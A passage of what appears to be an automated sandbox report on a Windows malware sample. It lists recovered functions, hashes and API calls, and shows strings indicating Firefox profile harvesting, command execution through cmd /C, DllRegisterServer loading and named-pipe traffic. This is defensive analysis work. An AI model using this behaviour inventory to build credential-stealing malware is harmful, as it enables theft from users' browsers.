  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5C23, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59 Total matches: 27stringtime
Similarity
  • Total matches: 27
  • API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID: Main
  • API String ID: 3521027233-521822810
  • Opcode ID: bc401ce39ed135578d671bff3c7e0c2395a673578b9a283240c4e40e0584cd5d
  • Instruction ID: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
  • Opcode Fuzzy Hash: 10E02B34084403D7901B60A90C06F18DE4EF3603C8CCE2A65C41129A061B56326E2F3B
  • Instruction Fuzzy Hash: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
APIs
  • lstrcmpi.KERNEL32(00000000,Main), ref: 001C5C44
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5C56
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5C69
  • lstrcmpi.KERNEL32(001EB260,00000000), ref: 001C5C8A
  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,001C9732,00000000), ref: 001C5C9E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4EEE, Relevance: 9.2, APIs: 6, Instructions: 187 Total matches: 61memorystringthread
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8CA3, Relevance: 9.1, APIs: 6, Instructions: 72 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6C08, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141 Total matches: 19registrysynchronization
Similarity
  • Total matches: 19
  • API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject
  • String ID: %APPDATA%\Mozilla\Firefox\Profiles
  • API String ID: 2346524515-3215297822
  • Opcode ID: 04e48ca811839595ab19984103b0a713a9098f9930145295782b9b8a8acae543
  • Instruction ID: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
  • Opcode Fuzzy Hash: 64110C72556761C8C9256C84281E37A35C3FA833D3D2C7703EDA071A8B4B8261ECBD98
  • Instruction Fuzzy Hash: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
APIs
    • Part of subcall function 001D83A0: GetProcAddress.KERNEL32(001ED992,001C6C3C,00000000), ref: 001D83B4
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
    • Part of subcall function 001C3996: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001C3996: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
    • Part of subcall function 001C3996: GetLastError.KERNEL32 ref: 001C3A9B
    • Part of subcall function 001C3996: HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
    • Part of subcall function 001C3996: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
  • SetEvent.KERNEL32(00000001,001EB1D0,?,00000000), ref: 001C6C91
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C6D1E
  • RegOpenKeyA.ADVAPI32(80000001,001EC992,?), ref: 001C6D4F
  • RegCloseKey.ADVAPI32(?), ref: 001C6D77
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
    • Part of subcall function 001D9029: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 001D905A
    • Part of subcall function 001D9029: RtlNtStatusToDosError.NTDLL(C000009A), ref: 001D9095
    • Part of subcall function 001D6D18: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
    • Part of subcall function 001D6D18: GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001D6D18: ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
    • Part of subcall function 001D6D18: GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
    • Part of subcall function 001D6D18: CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
Strings
  • %APPDATA%\Mozilla\Firefox\Profiles, xrefs: 001C6CA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C838C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102 Total matches: 54memory
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3F95, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80 Total matches: 37memorystring
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4202, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63 Total matches: 53memoryregistry
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C29BF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41 Total matches: 45memorystring
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9EAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33 Total matches: 56memorystring
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAF14, Relevance: 7.7, APIs: 5, Instructions: 174 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8B4E, Relevance: 7.6, APIs: 5, Instructions: 125 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C45F0, Relevance: 7.6, APIs: 5, Instructions: 121 Total matches: 58memoryregistrysynchronization
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7878, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
